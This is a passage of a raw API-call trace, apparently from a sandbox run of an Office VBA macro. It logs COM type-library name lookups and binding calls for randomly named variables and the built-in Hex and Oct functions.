cchWideChar=9 | out: lpWideCharStr="wBwGADU") returned 8 [0069.733] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wBwGADU", lHashVal=0x1058b8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bea, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wBwGADU") returned 8 [0069.733] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wBwGADU", lHashVal=0x1058b8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.733] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBwGADU") returned 0x1058b8 [0069.733] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wBwGADU" | out: _Dst="wBwGADU") returned 0x0 [0069.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wBwGADU") returned 8 [0069.733] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.733] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wBwGADU", lHashVal=0x1058b8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.733] IUnknown:Release (This=0x665ba50) returned 0xd [0069.733] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.733] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wBwGADU", lHashVal=0x1058b8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.734] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.734] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.734] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wBwGADU", lHashVal=0x1058b8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.734] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.734] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.734] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wBwGADU", lHashVal=0x1058b8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.734] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bea, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wBwGADU") returned 8 [0069.734] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wBwGADU", lHashVal=0x1058b8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.734] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.734] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81bea | out: _Dst=0x67c2d40) returned 0x0 [0069.734] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wBwGADU") returned 0x105c3c [0069.734] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wBwGADU" | out: _Dst="_B_var_wBwGADU") returned 0x0 [0069.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wBwGADU") returned 15 [0069.734] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.734] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wBwGADU", lHashVal=0x105c3c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.734] IUnknown:Release (This=0x665ba50) returned 0xd [0069.734] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.734] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wBwGADU", lHashVal=0x105c3c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.734] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.734] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.734] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wBwGADU", lHashVal=0x105c3c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.735] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.735] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.735] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wBwGADU", lHashVal=0x105c3c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.735] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.735] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.735] IUnknown:Release (This=0x665ba50) returned 0xd [0069.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870f1e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_wBwGADU") returned 15 [0069.735] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wBwGADU", lHashVal=0x105c3c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.735] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81bea | out: _Dst=0x144ec0) returned 0x0 [0069.735] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAcAAQZ", lHashVal=0x1095a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c12, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAcAAQZ") returned 8 [0069.735] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAcAAQZ", lHashVal=0x1095a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c12, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAcAAQZ") returned 8 [0069.735] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAcAAQZ", lHashVal=0x1095a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.735] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAcAAQZ") returned 0x1095a3 [0069.735] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YAcAAQZ" | out: _Dst="YAcAAQZ") returned 0x0 [0069.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YAcAAQZ") returned 8 [0069.735] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.735] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAcAAQZ", lHashVal=0x1095a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.735] IUnknown:Release (This=0x665ba50) returned 0xd [0069.735] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.735] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAcAAQZ", lHashVal=0x1095a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.735] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.735] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.735] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAcAAQZ", lHashVal=0x1095a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.736] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.736] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.736] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAcAAQZ", lHashVal=0x1095a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.736] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c12, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAcAAQZ") returned 8 [0069.736] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAcAAQZ", lHashVal=0x1095a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.736] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.736] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81c12 | out: _Dst=0x67c2d40) returned 0x0 [0069.736] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAcAAQZ") returned 0x1089a6 [0069.736] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YAcAAQZ" | out: _Dst="_B_var_YAcAAQZ") returned 0x0 [0069.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YAcAAQZ") returned 15 [0069.736] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.736] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAcAAQZ", lHashVal=0x1089a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.736] IUnknown:Release (This=0x665ba50) returned 0xd [0069.736] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.736] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAcAAQZ", lHashVal=0x1089a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.736] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.736] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.736] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAcAAQZ", lHashVal=0x1089a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.736] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.736] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.736] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAcAAQZ", lHashVal=0x1089a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.736] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.736] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.736] IUnknown:Release (This=0x665ba50) returned 0xd [0069.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870f4e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_YAcAAQZ") returned 15 [0069.736] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAcAAQZ", lHashVal=0x1089a6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.736] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81c12 | out: _Dst=0x144ec0) returned 0x0 [0069.737] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAwQAB", lHashVal=0x109237, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c3a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAwQAB") returned 7 [0069.737] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAwQAB", lHashVal=0x109237, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c3a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAwQAB") returned 7 [0069.737] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAwQAB", lHashVal=0x109237, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.737] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAwQAB") returned 0x109237 [0069.737] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAwQAB" | out: _Dst="tAwQAB") returned 0x0 [0069.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAwQAB") returned 7 [0069.737] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.737] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAwQAB", lHashVal=0x109237, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.737] IUnknown:Release (This=0x665ba50) returned 0xd [0069.737] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.737] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAwQAB", lHashVal=0x109237, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.737] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.737] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.737] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAwQAB", lHashVal=0x109237, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.737] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.737] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.737] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAwQAB", lHashVal=0x109237, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.737] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c3a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAwQAB") returned 7 [0069.737] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAwQAB", lHashVal=0x109237, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.737] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.738] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81c3a | out: _Dst=0x67c2d40) returned 0x0 [0069.738] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAwQAB") returned 0x100ca1 [0069.738] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAwQAB" | out: _Dst="_B_var_tAwQAB") returned 0x0 [0069.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAwQAB") returned 14 [0069.738] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.738] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAwQAB", lHashVal=0x100ca1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.738] IUnknown:Release (This=0x665ba50) returned 0xd [0069.738] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.738] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAwQAB", lHashVal=0x100ca1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.738] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.738] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.738] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAwQAB", lHashVal=0x100ca1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.738] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.738] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.738] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAwQAB", lHashVal=0x100ca1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.738] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.738] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.738] IUnknown:Release (This=0x665ba50) returned 0xd [0069.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870f7e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAwQAB") returned 14 [0069.738] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAwQAB", lHashVal=0x100ca1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.738] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81c3a | out: _Dst=0x144ec0) returned 0x0 [0069.738] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.738] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.738] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.738] IUnknown:Release (This=0x665ba50) returned 0xd [0069.738] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.738] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.739] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.739] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.739] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.739] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.739] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.739] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.739] IUnknown:Release (This=0x665ba50) returned 0xd [0069.739] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.739] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.739] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.739] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.739] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.739] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.739] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.739] IUnknown:Release (This=0x665ba50) returned 0xd [0069.739] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.739] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.739] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.739] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.739] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.739] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.739] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.740] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.740] IUnknown:Release (This=0x665ba50) returned 0xd [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.740] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.740] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.740] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 